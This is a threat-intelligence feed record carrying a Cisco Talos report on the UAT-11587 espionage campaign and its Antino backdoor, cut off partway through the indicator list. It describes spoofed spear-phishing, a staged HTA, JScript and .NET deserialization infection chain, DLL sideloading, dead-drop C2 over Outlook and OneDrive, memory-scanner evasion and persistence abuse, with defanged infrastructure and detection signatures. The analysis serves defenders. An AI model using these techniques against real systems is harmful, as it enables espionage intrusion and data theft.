{"success":true,"data":{"threats":[{"id":"b03974dc-16e5-453f-8f31-6bf2028276b9","slug":"talos-china-nexus-uat-11587-targets-government-and-policy-94d4e2d7","externalId":"6ab6d674db2bd20001a36150","source":"Cisco Talos","sourceType":"vendor-rss","type":"security-news","title":"China-nexus UAT-11587 targets government and policy organizations across Asia with Antino backdoor","description":"Cisco Talos uncovered a cluster of activity we track as UAT-11587 targeting government and policy organizations across Asia, including in Taiwan, India, the Philippines, and Cambodia, to deliver a previously undocumented backdoor referred to as &#x201c;Antino&#x201d; in developer artifacts.&#xa0;Talos first observed UAT-11587 activity in September 2025.&#xa0;By July 2026, Talos had identified at least 16 affected or targeted institutional environments across eight Asian countries.&#xa0;Antino is a Rust-compiled Windows backdoor that supports host reconnaissance, shell and PowerShell execution, file transfer, in-memory shellcode loading and persistence. Its native command-and-control channel operates exclusively through Microsoft 365, using Microsoft Graph to interact with Outlook and OneDrive.&#xa0;Talos identified a recurring delivery branch that began with spear-phishing emails and tailored decoy documents, followed by a five-stage infection chain. The actor relied heavily on Cloudflare infrastructure for delivery, execution tracking, and payload staging.&#xa0;Based on the development, preparation-environment, and targeting indicators detailed in this report, Talos assesses with high confidence that UAT-11587 is China-nexus.Overview&#xa0;Talos first identified UAT-11587&#x2019;s campaign while investigating a spear-phishing campaign directed at Taiwan&apos;s academic, think tank, and civil society policy community in March 2026. The message recreated Gmail&apos;s attachment interface and directed the target into a cloud-hosted, multi-stage infection chain.&#xa0; Across this activity, our researchers assessed that the actor used several delivery methods, loader families, and post-compromise tools. One recurring final-stage payload was a custom Rust backdoor that Talos tracks as Antino. Antino communicates with Microsoft 365 applications and uses Outlook and OneDrive objects as dead drops, rather than depending on a conspicuous dedicated command server.&#xa0; Further investigation showed that the activity extended beyond the initial Taiwan operation. Talos subsequently identified confirmed or probable affected government and security environments across multiple Asian countries, alongside additional regional targeting supported by lure content.&#xa0;&#xa0; While this report was being prepared, Symantec published research on an activity set it tracks as Jewelbug. Talos identified overlaps between UAT-11587 and the Antino-related espionage activity attributed to Jewelbug. Although Symantec reported that Jewelbug conducted both espionage and cryptocurrency fraud, it assessed that &#x201c;the SEO business supplied access, delivery and infrastructure into the espionage operation, rather than that one person performed both roles.&#x201d; Talos could not independently verify a connection between the espionage campaign and Jewelbug&#x2019;s financially motivated activity. We therefore track UAT-11587 as a separate activity set.&#xa0; Who is UAT-11587?&#xa0;Talos assesses with high confidence that UAT-11587 is a China-nexus actor, based on the totality of corroborating technical and operational evidence, rather than any single indicator. The indicators discussed below are selected examples of the broader evidence supporting this assessment.&#xa0; Evidence supporting the attribution assessment&#xa0;Decoy document metadata provides several preparation-environment clues. A Taiwan-focused decoy contains the zh-CN language tag, the Simplified Chinese author value &#x672a;&#x5b9a;&#x4e49; (&#x201c;undefined&#x201d;), and an explicit +08:00 creation timestamp. Both recovered spear-phishing messages also contain +08:00 date headers. UTC+8 alone is not geographically distinctive because it is used across mainland China, Taiwan, Hong Kong, Singapore, and other locations. However, the combination of the +08:00 offset, the zh-CN language tag and Simplified Chinese metadata is more consistent with a mainland Chinese environment than with Taiwan or Hong Kong, where Traditional Chinese predominates.&#xa0; Figure 1. Decoy metadata.&#xa0;The campaign&#x2019;s lure theme and targeting provide additional contextual support. Its lures and observed targets include Taiwanese political, legislative, civil defense, and policy research subjects, together with regional government, maritime, diplomatic, and security themes. This collection focus is consistent with China-nexus actor interests.&#xa0;&#xa0; Another supporting indicator appears in Antino&#x2019;s development artifacts. Ten distinct Antino build outputs contain Cargo registry paths referencing rsproxy.cn, a Rust package mirror intended to improve dependency downloads within mainland China. The service&#x2019;s public accessibility does not reveal the developer&#x2019;s location, but its repeated use suggests reliance on a China-focused Rust mirror.&#xa0; During our investigation, Talos also identified a JavaScript downloader associated with UAT-11587 that referenced &#x201c;d32tpl7xt7175h[.]cloudfront[.]net&#x201d;, the same CloudFront distribution previously reported by Arctic Wolf in China-nexus UNC6384 delivery activity. This shared infrastructure suggests possible delivery-layer overlap. However, because cloud infrastructure can be reused and the campaigns employed different core malware and command-and-control (C2) architectures, Talos assesses this relationship with low confidence and continues to track UAT-11587 as a separate activity cluster.&#xa0;&#xa0; Victimology&#xa0;UAT-11587 primarily targeted public-sector and national-security-adjacent organizations across Asia. By July 2026, Talos had identified at least 10 confirmed and five probable affected institutional environments, plus one additional intended target. Our investigation reveals approximately 350 compromised endpoints across eight countries.&#xa0; &#xa0;The affected or targeted sectors included:&#xa0; Defense, military, and national security&#xa0;Executive government and central public administration&#xa0;Foreign affairs and diplomatic services&#xa0;Justice, law enforcement, border security, and interior security&#xa0;Legislative and parliamentary institutions&#xa0;Government IT and shared e-government services&#xa0;Think tanks, universities, and research institutions&#xa0;Civil society, human rights, and public policy organizations&#xa0;&#xa0;Based on the available evidence, Talos assesses with moderate-to-high confidence that the campaign targeted organizations in Taiwan, India, the Philippines, Cambodia, Pakistan, Thailand, Myanmar, and Syria.&#xa0; Figure 2. Victimology mapBased on its sustained targeting of government and national security-adjacent organizations, tailored political and diplomatic lures, and capabilities supporting persistent access and information collection, Talos assesses with moderate confidence that UAT-11587 is conducting intelligence gathering operation. &#xa0; Campaign timeline&#xa0;Talos observed UAT-11587 activity from September 2025 through July 2026. The earliest reviewed activity, from September through November 2025, used Philippines-themed lures and direct email attachment delivery. In January 2026, the actor conducted two additional Philippines-focused HTML application (HTA) campaigns and began using a broader set of policy and geopolitical lures alongside a standalone fake installer delivery branch. Activity accelerated between March and early June, with closely timed operations involving the Philippines and Taiwan, followed by activity affecting or targeting environments in Cambodia, Myanmar, Syria, Pakistan, and Thailand. The largest concentrated wave occurred on June 8 and 9, when Talos identified around 57 newly observed endpoints associated with India.&#xa0; Figure 3. Timeline of UAT-11587 campaign activity.Spear-phishing delivery and sender spoofing&#xa0;UAT-11587, like many targeted intrusion sets, relies on spear-phishing emails to deliver its infection chain. The social engineering themes used in these emails suggest the threat actor possessed detailed prior knowledge of their target organizations. This targeting precision is particularly apparent in the Taiwan campaigns, where lure content was carefully aligned with the operational and institutional context of each target.&#xa0; Abusing sender-domain misalignment to spoof trusted senders&#xa0;To make its spear-phishing emails appear more credible, UAT-11587 spoofed sender identities trusted by the intended recipients. The actor exploited the distinction between the SMTP envelope sender and the visible From header. Messages were sent through Migadu using the attacker-controlled &#x201c;osc-cdn[.]com&#x201d; domain as the RFC5321 envelope sender, while the RFC5322 From header displayed the identity of the organization being impersonated.&#xa0; &#xa0;SPF passed because Migadu&#x2019;s sending infrastructure was authorized to send email on behalf of &#x201c;osc-cdn[.]com&#x201d;. However, this result authenticated only the envelope-sender domain, not the sender displayed to the recipient. DMARC detected that the envelope and visible sender domains were not aligned and returned a failure. In the reviewed message, the displayed domain used a non-enforcing p=none policy, which requested monitoring rather than quarantine or rejection. The receiving provider therefore accepted the message, allowing the spoofed email to be successfully delivered to the recipient&#x2019;s inbox despite the DMARC failure.&#xa0;&#xa0; Figure 4. The spoofed email passed SPF.&#xa0;Gmail attachment widget cloning&#xa0;Another social engineering technique used for initial access in this campaign was the closely replicated reconstruction of Gmail&#x2019;s native attachment preview widget inside the email HTML body. The actor replicated the styling of Gmail&#x2019;s attachment card using four inline PNG images embedded as Base64-encoded MIME parts. The entire attachment card was wrapped in an anchor tag pointing to an attacker-controlled URL. These links use Cloudflare Pages URLs with the pattern shown below. The ?m= parameter carries a target identifier and therefore permits per-recipient logging at the delivery service //my-<project>.pages.dev/File_download?m=<target-identifier>. The actor used a protocol-relative URL beginning with //, which may be overlooked by security tools that extract only fully qualified HTTP or HTTPS URLs.&#xa0; When a Gmail user opens the email in a browser, Gmail&#x2019;s renderer faithfully displays the attacker-controlled HTML, producing a fake attachment widget that is visually indistinguishable from a legitimate Gmail attachment preview.&#xa0; Figure 5. Spear-phishing email sample.Figure 6. HTML code in the email with link to download malware.Tailored lures and decoy documents&#xa0;Our analysis recovered three decoy documents during separate UAT-11587 operations. The first decoy described a workshop focused on the &#x201c;Taiwan Information Warfare.&#x201d; The document referenced a 2025 TikTok study and discussed perceived public knowledge gaps concerning cross-strait issues and information manipulation.&#xa0;&#xa0; Figure 7. Decoy document recovered from Taiwan-targeting campaign.&#xa0;The second decoy, titled &#x201c;&#x7acb;&#x6cd5;&#x59d4;&#x54e1;&#x884c;&#x4f7f;&#x8077;&#x52d9;&#x652f;&#x9818;&#x4e4b;&#x5404;&#x9805;&#x8cbb;&#x7528;&#x5fb5;&#x514d;&#x7a05;&#x539f;&#x5247;&#x201d; (&#x201c;Principles governing the taxation of expenses received by legislators in performing their duties&#x201d;), used a narrower administrative pretext. It describes the income tax treatment of legislators&#x2019; remuneration, overseas travel, and expenses incurred while performing legislative duties. The document exactly reproduces a public Taiwan Ministry of Finance ruling to make the decoy appear credible. Its subject strongly suggests that it was prepared for members of Taiwan&apos;s public sector.&#xa0; Figure 8. Taiwan-focused decoy document.&#xa0;Outside Taiwan, Talos recovered a two-page decoy titled &#x201c;CSIS Indo-Pacific Forecast 2026 (Event Details).&#x201d; The document borrowed the framing of a legitimate event and referenced real experts, presenting an agenda focused on regional alliances, gray-zone security, demographic trends, and human security. The subject matter would plausibly appeal to government, diplomatic, think tank, academic, and security policy audiences across the Indo-Pacific, including readers focused on India.&#xa0; Figure 9. Indo-Pacific policy-themed decoy document.&#xa0;Beyond the recovered decoys, file names of malicious executables, HTA files, and WSF stagers revealed additional themes spanning maritime policy, foreign affairs, diplomatic events, human rights, government administration, and technology research.&#xa0; One lure shows how the actor exploited current geopolitical developments. &#x201c;Trump&#x2019;s Former Russia Adviser Claims Moscow Offered US Free Rein in Venezuela in Exchange for Ukraine&#x201d; closely paraphrased an Associated Press report, with two related samples appearing on VirusTotal two days later.&#xa0;&#xa0; Together, these examples show the actor using both news-style headlines and official-sounding documents to target audiences interested in foreign affairs, international security, and government policy.&#xa0; The table below lists the likely audience for each lure. Where recipient details or decoy content were unavailable, assessments are based solely on file names and subject matter and do not confirm delivery or compromise.&#xa0; Lure or decoy title&#xa0; Potential target or audience&#xa0; 115&#x5e74;&#x5ea6;&#x85aa;&#x8cc7;&#x6240;&#x5f97;&#x6263;&#x7e73;&#x7a05;&#x984d;&#x8868;&#x8aaa;&#x660e; (Instructions for the 2026 Salary Income Tax Withholding Table)&#xa0; Taiwanese think tank&#xa0; Resolution on the Updated Chart of Bajo de Masinloc&#xa0; Likely Philippine public sector&#xa0; Trump&apos;s Former Russia Adviser Claims Moscow Offered US Free Rein in Venezuela in Exchange for Ukraine&#xa0; Foreign-policy, government, research, or media audiences interested in the topic.&#xa0; CrossBorder_Repression_Seminar_Agenda&#xa0; Likely human-rights, civil-society, diaspora, academic, or policy communities.&#xa0; the May 27 inauguration of the TPiE&#xa0; Regional political and civil-society audiences&#xa0; Tehran_Bilateral_Summit_Proceedings_May2026&#xa0; Likely diplomatic, foreign-affairs, or policy audiences following a Tehran-based bilateral meeting.&#xa0; Items likely to be considered in the next Cabinet meeting.T11065885611.doc.exe&#xa0; &#xa0;Indian government audiences&#xa0; UO -C-DAC (1)&#xa0; Indian government technology and research audiences&#xa0; The infection chain&#xa0;In the reviewed spear-phishing operations, the actor uses a five-stage infection chain that begins with an HTA stager. Later stages abuse unsafe BinaryFormatter deserialization and gadget chains in standard .NET assemblies to load and execute the final payload.&#xa0; Figure 10. Antino backdoor infection chain.Stage 1: HTA and WSF Stager&#xa0;The &#x201c;my-<project>.page[.]dev&#x201d; Cloudflare URL in the spear-phishing emails leads to the download of an HTA file that was executed by mshta.exe. It hides and resizes its window, emits a tracking request to an invariant Cloudflare Pages beacon, and imports the next JavaScript stage from a cloud-hosted location. The same general template appears across multiple campaign variants:&#xa0; Figure 11. HTA stager.&#xa0;The actor uses two cloud services to deliver the second-stage JavaScript:&#xa0; Cloudflare R2: &#x201c;pub-<32-character hexadecimal identifier>[.]r2[.]dev&#x201d;&#xa0;Amazon CloudFront: &#x201c;d2nq35tel3ucuo[.]cloudfront[.]net&#x201d;&#xa0;The fixed Cloudflare Pages hostname &#x201c;oisadjfoinsiduhfnoisdnfosdnoifnsoid[.]pages[.]dev&#x201d; appears across multiple reviewed HTA variants. A hidden image causes mshta.exe to send a request containing the lure title in the URL path and ?track in the query string. This could allow the operator to correlate HTA execution with a particular lure for campaign tracking.&#xa0;&#xa0; Talos also observed WSF stagers that perform the same role through Windows Script Host. They send an HTTP HEAD request to the tracking host name with the lure title in the URL path, then load the next JavaScript stage from Cloudflare R2. Although paired HTA and WSF samples use different R2 objects and obfuscated loaders, both lead to the same infection chain.&#xa0;&#xa0; Figure 12. WSF stager script.Stage 2: HTA-hosted JScript downloader and decryptor&#xa0;The Stage 2 component is HTA-hosted Microsoft JScript, delivered from Cloudflare R2 and loaded in-process by mshta.exe through the HTA stager. It acts as a downloader and decryptor that prepares the next stage in-memory .NET deserialization chain. The script retrieves three encrypted resources from the cloud-hosted delivery infrastructure:&#xa0; Encrypted JavaScript orchestrator (.js file)&#xa0;Encrypted .NET serialized gadget resource 1 (.txt file)&#xa0;Encrypted .NET serialized gadget resource 2 (.txt file)&#xa0;After downloading the files, the script applies custom Base64 decoding and decrypts each response with RC4 using an embedded key. It then executes the decrypted JScript orchestrator in memory to initiate the .NET 4.x deserialization chain.&#xa0; Figure 13. HTA-hosted JScript downloader and decryptor.&#xa0;Stage 3: .NET BinaryFormatter deserialization chain&#xa0;The three files downloaded from Cloudflare R2 or Amazon CloudFront are the JScript orchestrator and two serialized .NET gadget resources. The threat actor leverages a scripted .NET deserialization technique in which JScript instantiates COM-visible .NET classes and passes attacker-controlled serialized data into BinaryFormatter. During deserialization, the embedded gadget chain drives execution, allowing the malware to load and execute an embedded .NET assembly, the next-stage &#x201c;TestAssembly.dll&#x201d;, inside the script host process, mshta.exe.&#xa0; Figure 14. JScript orchestrator.&#xa0;The JScript orchestrator deserializes the two resources in sequence. It first attempts to deserialize stage_1, which appears designed to disable a .NET security check introduced to block ActivitySurrogateSelector-based deserialization gadget chains. The code wraps this operation in a try/catch block and proceeds to stage_2 when an exception occurs, suggesting the actor anticipated differences in .NET versions, patch levels, or assembly availability across target systems. The two-call behavior observed in stage_1 appears intended to improve compatibility across different .NET patch levels.&#xa0;&#xa0; The second serialized resource, stage_2, uses the System.Windows.Forms.AxHost+State deserialization gadget in combination with an ActivitySurrogateSelector gadget chain. This technique substitutes a surrogate object during deserialization to drive code execution. In this case, the gadget chain loads the embedded PE file, &#x201c;TestAssembly.dll&#x201d;, directly into memory and executes it inside mshta.exe.&#xa0; Stage 4: &#x201c;TestAssembly.dll&#x201d; downloader and launcher&#xa0;&#x201c;TestAssembly.dll&#x201d; is a small .NET downloader and launcher that Stage 3 loads directly into mshta.exe through the BinaryFormatter deserialization chain. It downloads a lure-specific decoy document and a three-file DLL-sideloading bundle from cloud-hosted infrastructure. It opens the decoy, writes the bundle to a writable staging directory, and launches the Microsoft-signed &#x201c;GatherOsState.exe&#x201d;, which sideloads &#x201c;slc.dll&#x201d;, the Antino backdoor.&#xa0; The table below shows the files retrieved during one Taiwan-targeting campaign. Note that the actor uses randomized nonstandard extensions (.luy, .pzs, .syk) that remove obvious executable/DLL filename signaling.&#xa0;&#xa0; CDN URL&#xa0; Actual Content&#xa0; Description&#xa0; pub-abfa7742e315485a98a5fafd6dbfb68e.r2.dev/HeiqAW6Z[&#x2026;].pdf&#xa0; Lure-specific PDF&#xa0; Decoy document opened for the victim&#xa0; pub-abfa7742e315485a98a5fafd6dbfb68e.r2.dev/HeiqAW6ZGatherOsState.exe.luy&#xa0; GatherOsState.exe (legitimate signed binary)&#xa0; Legitimate signed binary that loads slc.dll&#xa0; pub-abfa7742e315485a98a5fafd6dbfb68e.r2.dev/HeiqAW6Zslc.dll.pzs&#xa0; slc.dll (Antino C2 implant)&#xa0; &#xa0;Antino backdoor&#xa0; pub-abfa7742e315485a98a5fafd6dbfb68e.r2.dev/HeiqAW6ZOsGather.dat.syk&#xa0; OsGather.dat&#xa0;&#xa0; Calculator decoy PE&#xa0; All the &#x201c;TestAssembly.dll&#x201d; downloader builds recovered in this investigation share the AssemblyAttribute GUID b2b3adb0-1669-4b94-86cb-6dd682ddbea3. This is a useful tooling-level detection marker.&#xa0;&#xa0;&#xa0; Figure 15. .NET assembly metadata for the TestAssembly component.&#xa0;Stage 5: Signed-host DLL sideloading Antino backdoor&#xa0;The downloaded &#x201c;GatherOsState.exe&#x201d; is a legitimate Microsoft-signed Windows Assessment and Deployment Kit (ADK) binary that was abused for DLL sideloading. When executed, it loads &#x201c;slc.dll&#x201d; from its local directory. The attacker placed the Antino backdoor file slc.dll alongside the signed executable, which then calls the DLL&#x2019;s SLOpen export to start Antino.&#xa0; C2 infrastructure&#xa0;Beyond email delivery, UAT-11587 relied extensively on Cloudflare throughout the infection chain. Cloudflare Pages hosted malicious HTA and WSF files and a separate execution-tracking endpoint, while Cloudflare R2 stored encoded loader stages, decoy documents, and payload components. UAT-11587 also used Amazon CloudFront to deliver additional scripts and decoy content. This architecture placed much of the infection chain within widely used cloud services and ordinary HTTPS traffic.&#xa0; We also identified software-themed domains that directly hosted standalone Antino executables. The domain &#x201c;microsoft-flash[.]com&#x201d;, registered shortly before its use, served Antino samples from &#x201c;https://microsoft-flash[.]com/download/flashcenter_pp_ax_install_en.exe&#x201d;. Similarly, &#x201c;wps-cn[.]com&#x201d; delivered a related Antino build from &#x201c;https://www.wps-cn[.]com/downloads/flashcenter_pp_ax_install_en.exe&#x201d;. The choice of &#x201c;wps-cn[.]com&#x201d; may also indicate that the delivery site was designed to appeal to Chinese-speaking users, particularly those in mainland China.&#xa0; While the infection chain relied heavily on Cloudflare, Antino itself used Microsoft 365 for post-compromise C2. The &#x201c;Dead-drop C2 communication&#x201d; section explains this channel in more detail.&#xa0; The Antino backdoor&#xa0;Antino is a , Rust-compiled Windows backdoor observed in both 32-bit and 64-bit builds. Talos named the malware after identifying AntinoApp in its Windows application manifest and repeated antino directory names in PDB and Rust source paths across multiple variants. It supports host reconnaissance, command execution, persistence, and Microsoft Graph-based C2, using Outlook for command exchange and OneDrive for heartbeat and file transfer.&#xa0; Figure 16. The Windows application manifest identifies the program as AntinoApp.&#xa0; D:\\a\\antino\\antino\\target\\x86_64-pc-windows msvc\\release\\deps\\slc_template.pdb&#xa0; D:\\a\\antino\\antino\\target\\x86_64-pc-windows-msvc\\release\\deps\\antino_client_template.pdb D:\\a\\antino\\antino\\target\\i686-pc-windows-msvc\\release\\deps\\antino_client_template.pdb D:\\a\\antino\\antino\\client\\src\\core.rs D:\\a\\antino\\antino\\client\\src\\signaller\\mod.rs D:\\a\\antino\\antino\\client\\src\\artillery\\run.rs D:\\a\\antino\\antino\\client\\src\\config\\mod.rs D:\\a\\antino\\antino\\shared\\src\\command_client.rs D:\\a\\antino\\antino\\shared\\src\\command\\registry.rs D:\\a\\antino\\antino\\shared\\src\\command\\add_to_run.rs D:\\a\\antino\\antino\\shared\\src\\command\\cmd.rs D:\\a\\antino\\antino\\shared\\src\\command\\download_file.rs D:\\a\\antino\\antino\\shared\\src\\command\\execute_program.rs D:\\a\\antino\\antino\\shared\\src\\command\\exit.rs D:\\a\\antino\\antino\\shared\\src\\command\\list_files.rs D:\\a\\antino\\antino\\shared\\src\\command\\load.rs D:\\a\\antino\\antino\\shared\\src\\command\\ps.rs D:\\a\\antino\\antino\\shared\\src\\command\\system_info.rs D:\\a\\antino\\antino\\shared\\src\\command\\upload_file.rs The &#x201c;D:\\a\\antino\\antino\\...&#x201d; paths follow the standard GitHub Actions Windows workspace structure, &#x201c;D:\\a\\<repository>\\<repository>\\...&#x201d;. This suggests that the reviewed CI variants were compiled on GitHub-hosted Windows runners.&#xa0; The backdoor was observed in both standalone executable and DLL forms. Our analysis observed two generations of Antino, distinguished by consistent differences in their underlying code and Rust build environment. The clearest implementation differences involve session-ID generation and registration and heartbeat behavior.&#xa0;&#xa0;&#xa0; Characteristic&#xa0; Antino Gen1&#xa0; Antino Gen2&#xa0; Observed build period&#xa0; October 2025&#xa0; December 2025 to January 2026&#xa0; Application identity&#xa0; No AntinoApp manifest in the reviewed builds&#xa0; Uses the AntinoApp application manifest&#xa0; Session identifier&#xa0; XOR- and Base64-encodes the process ID, computer name, username and platform.&#xa0; Generates a random UUID v4 containing no host-derived information&#xa0; Registration and heartbeat&#xa0; Classic builds use sendsession and heartbeat email drafts; an early DLL already supports OneDrive heartbeats&#xa0; Stores JSON heartbeat objects under &#x201c;/antino/heartbeats/<session_id>.json&#x201d;; the heartbeat also registers the implant&#xa0; Dead-drop C2 communication&#xa0;Antino communicates exclusively through Microsoft 365, using the Microsoft Graph API to interact with Outlook and OneDrive as dead-drop C2 channels. Both Antino generations use broadly similar Microsoft 365-based C2 workflows. This design allows Antino&#x2019;s C2 traffic to blend into legitimate Microsoft application synchronization at the network layer. Outbound connections terminate at &#x201c;graph.microsoft.com&#x201d; and &#x201c;login.microsoftonline.com&#x201d;, both of which are widely trusted and commonly allowed in enterprise environments.&#xa0;&#xa0; The Antino Gen2 implant authenticates to Microsoft Graph using the OAuth 2.0 client-credentials flow. This authentication method allows the registered Entra ID application to access the configured Outlook mailbox and OneDrive resources without requiring an interactive user sign-in.&#xa0; The Antino implant uses two distinct mechanisms for C2 communication, implemented in separate modules:&#xa0; Mechanism 1: OneDrive file-based communication&#xa0; The Antino backdoor uses the threat actor&#x2019;s OneDrive for registration and file-based communication. The OneDrive folder used for communication includes three folder paths:&#xa0; Path&#xa0; Direction&#xa0; Purpose&#xa0; /antino/heartbeats/{id}.json&#xa0; Antino upload&#xa0;&#xa0; Beacon / check-in; carries system state&#xa0; /antino_downloads/{file}&#xa0; Antino upload&#xa0; Exfiltrated data from victims (files the operator downloads from victims)&#xa0; /antino_uploads/{file}&#xa0; Threat actor upload&#xa0; Toolkit delivery staging (files the operator uploads to victims)&#xa0; Antino uses the heartbeats folder to upload JSON-formatted heartbeat files containing host telemetry, including the session ID, timestamp, online/offline status, machine name, username, platform, and a campaign code defined in the backdoor configuration. Each implant session is assigned a randomly generated UUID, which is used as the heartbeat filename &#x201c;{session_id}.json&#x201d;. The implant uploads the heartbeat file to OneDrive during initial execution and resends every minute.&#xa0; Figure 17. Example heartbeat JSON.&#xa0;The directory naming is from the threat actor&#x2019;s perspective. &#x201c;antino_uploads/&#x201d; holds tools the operator pushes to victims, while &#x201c;antino_downloads/&#x201d; holds data the operator pulls from victims. The file-based polling model is characteristic of dead-drop C2 designs used to decouple operator activity from implant activity on the network.&#xa0; Mechanism 2: Outlook commands communication&#xa0; The Antino backdoor receives commands through email messages. The implant actively pulls commands from the threat actor&#x2019;s Outlook mailbox folder every 10 seconds. The protocol uses two message types: command emails contain tasking from the controller, while response emails contain the implant&#x2019;s results.&#xa0; Command messages are identified by the subject prefix command_req_[session_id] and responses by command_res_[session_id], as indicated in the HTTP GET request sent by Antino:&#xa0; Figure 18. Request from Antino to Outlook to get commands from emails.&#xa0;&#xa0;The body of each command message contains a JSON object with the information required for execution. It has three fields: command_type, the command to invoke; command_data, an object containing command-specific parameters; and request_id, a per-command identifier used to correlate the request with the corresponding response (the request_id is distinct from the implant session_id used in the message subject and heartbeat). For example, a cmd request has this body:&#xa0; Figure 19. The JSON sent in command request message.&#xa0;&#xa0;The response follows a similar structure. Its body contains a JSON object describing the outcome of command execution. The command_type field identifies the command that was executed, while request_id links the response to the corresponding request. The success field indicates whether the command succeeded, result contains the returned output, and error provides failure details or is null when execution succeeds. For example, a successful cmd response has the following body:&#xa0;&#xa0; Figure 20. The JSON sent in command response message.&#xa0;Antino-supported commands&#xa0;Antino is a comprehensive backdoor that supports several commands for host reconnaissance and execution. Across the reviewed Antino builds, Talos identified the following command handlers. Command availability varies by generation and build.&#xa0;&#xa0;&#xa0; Command/handler&#xa0; Capability&#xa0; cmd&#xa0; Runs cmd.exe /C and captures output&#xa0; powershell&#xa0; Runs powershell.exe -Command&#xa0; system_info&#xa0; Collects host and process context&#xa0; execute_program&#xa0; Executes an operator-supplied program&#xa0; list_files&#xa0; Enumerates a directory&#xa0; upload_file&#xa0; Transfers files from the threat actor&#x2019;s OneDrive to the compromised host&#xa0; download_file&#xa0; Exfiltrates files from the compromised host to the threat actor&#x2019;s OneDrive&#xa0; load_shellcode&#xa0; Runs operator-supplied shellcode in memory&#xa0; add_to_run&#xa0; Establishes Antino persistence by adding a Registry Run value&#xa0; exit&#xa0; Stops the Antino runtime&#xa0; Antino-supported commands. Command availability varies slightly by generation and build.&#xa0; The cmd and powershell commands allow the operator to execute commands directly through the Windows command shell or PowerShell and collect their output.&#xa0;&#xa0;&#xa0; Filesystem operations are handled through list_files, upload_file, and download_file. Similar to the C2 communication protocol, these names are written from the operator&#x2019;s perspective: upload_file transfers files from the threat actor&#x2019;s OneDrive to the compromised endpoint, while download_file reads a file from the endpoint and uploads it to OneDrive for operator retrieval.&#xa0;&#xa0; Antino provides two options for running actor-supplied code: load_shellcode and execute_program. The load_shellcode command sends a Base64-encoded payload in the command-request email body in the following JSON format:&#xa0; Figure 21. The load_shellcode command structure.Masking the loaded payload&#xa0; The use_sleep_mask parameter enables a defense evasion technique intended to reduce the secondary payload&#x2019;s exposure to memory scanners. When enabled, Antino hooks Sleep and VirtualAlloc and registers a vectored exception handler (VEH). The VirtualAlloc hook records the tracked memory region. When the tracked payload thread calls Sleep, the Sleep hook changes that region to non-executable (PAGE_READWRITE), encrypts its contents in place, and then calls the real Sleep function.&#xa0; &#xa0;After Sleep returns, an attempt to execute code from the encrypted, non-executable region triggers an access violation. The VEH confirms that the fault occurred within the tracked region, restores its previous memory protection, decrypts the content, and resumes execution. This technique is intended to reduce the time during which memory scanners can observe recognizable executable payload bytes. Although this technique does not mask the entire Antino process or guarantee evasion, it adds another layer of defense evasion by reducing the window in which memory scanners can identify the loaded payload.&#xa0; Abuse of the Windows Scripted Diagnostics framework workflow&#xa0;&#xa0; The Antino backdoor abuses the Windows Scripted Diagnostics framework to execute attacker-controlled PowerShell through legitimate Windows components. Both the execute_program and add_to_run commands use this technique.&#xa0; This workflow involves three components:&#xa0;&#xa0; Scripted Diagnostics Execution Engine (&#x201c;sdiageng.dll&#x201d;)&#xa0;Program Compatibility Wizard (PCW) troubleshooting package (&#x201c;C:\\Windows\\diagnostics\\system\\PCW&#x201d;)&#xa0;&#xa0;Scripted Diagnostics Native Host process (&#x201c;sdiagnhost.exe&#x201d;)&#xa0;Windows normally uses &#x201c;sdiageng.dll&#x201d; to load troubleshooting packages such as PCW, while &#x201c;sdiagnhost.exe&#x201d; executes their PowerShell scripts in a separate process.&#xa0; Antino initializes COM and creates an instance of CLSID {1F3D8AA5-9EBF-4EE4-85C2-EA40379AEDE8}, the CScriptedDiag class implemented by &#x201c;sdiageng.dll&#x201d;. It then initializes the engine with the legitimate PCW package and a blank diagnostic Answers XML document. The engine creates a temporary working copy of the package and returns its directory, such as &#x201c;C:\\Windows\\Temp\\SDIAG_<GUID>&#x201d;.&#xa0; Antino writes an attacker-controlled PowerShell script into this directory. For example, the add_to_run command generates a script that creates an HKCU Run key value:&#xa0; Figure 22. PowerShell script generated by Antino&#x2019;s add_to_run command.Antino then resumes the diagnostic workflow. The Scripted Diagnostics engine delegates execution to the native host, observed in runtime traces as %windir%\\SysWOW64\\sdiagnhost.exe -Embedding. The host subsequently executes result.ps1. The resulting Run key entry launches the selected Antino executable the next time the affected user signs in.&#xa0; &#xa0;The technique allows Antino to proxy PowerShell execution and the persistence-related registry modification through a Microsoft-signed diagnostic workflow. This can complicate behavioral attribution to the original implant, although it does not eliminate observable PowerShell, file-creation or registry telemetry.&#xa0; Figure 23. Antino calls CoCreateInstance to activate the Windows diagnostic COM class.&#xa0;Antino configuration&#xa0;&#xa0;Antino stores the configuration data in a custom PE section named .cfg. The on-disk structure begins with a four-byte little-endian JSON length followed by bytes XORed with the alternating key 0xAB 0xCD.&#xa0;&#xa0; In addition to its C2 configuration, Antino&#x2019;s embedded configuration contains two deployment settings, run and launch_mode. The run field controls whether Antino automatically installs a persistent copy when it starts. When set to true, Antino launches its installation task, stages the required files under %LOCALAPPDATA%\\Windows GatherOSStateKit\\, and creates an HKCU Run value. launch_mode is evaluated only when run is set to true. It defines which files constitute the persistent payload: exe or raw for standalone PE or dll for sideloading.&#xa0; Coverage&#xa0;The following ClamAV signatures detect and blocks this threat:&#xa0;&#xa0; Html.Trojan.UAT-11587-10060367-2&#xa0;Txt.Trojan.UAT-11587-10060385-5&#xa0;Txt.Trojan.UAT-11587-10060386-1&#xa0;Win.Trojan.UAT-11587-10060365-1&#xa0;Win.Trojan.UAT-11587-10060366-1&#xa0;Win.Trojan.UAT-11587-10060369-1&#xa0;Win.Trojan.UAT-11587-10060370-1&#xa0;Win.Trojan.UAT-11587-10060371-1&#xa0;Win.Trojan.UAT-11587-10060372-1&#xa0;Win.Trojan.UAT-11587-10060373-1&#xa0;Win.Trojan.UAT-11587-10060374-1&#xa0;Win.Trojan.UAT-11587-10060375-1&#xa0;Win.Trojan.UAT-11587-10060376-1&#xa0;Win.Trojan.UAT-11587-10060377-1&#xa0;Win.Trojan.UAT-11587-10060378-1&#xa0;Win.Trojan.UAT-11587-10060379-1&#xa0;Win.Trojan.UAT-11587-10060380-1&#xa0;Win.Trojan.UAT-11587-10060381-1&#xa0;Win.Trojan.UAT-11587-10060382-1&#xa0;Win.Trojan.UAT-11587-10060383-1&#xa0;Win.Trojan.UAT-11587-10060384-1&#xa0;The following Snort rules cover this threat:&#xa0;&#xa0; Snort 2: 1:66880, 1:66881, 1:66882&#xa0;Snort 3: 1:66880, 1:66881, 1:66882&#xa0;Indicators of compromise (IOCs)&#xa0;&#xa0;IOCs for this research can also be found at our GitHub repository here.&#xa0; e809da86bd81463347fa7f922d3e088755a94a331889d32acb55aa8f57778a34 (malicious 